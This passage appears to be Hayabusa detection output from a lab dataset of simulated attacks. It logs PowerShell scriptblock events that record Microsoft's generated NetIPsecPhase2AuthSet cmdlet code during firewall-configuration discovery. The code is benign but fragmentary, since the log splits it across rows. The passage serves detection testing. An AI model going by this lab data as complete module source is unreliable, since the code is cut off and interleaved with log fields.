${Name}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { 
[object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', 
Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPs",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.957 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') 
-and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 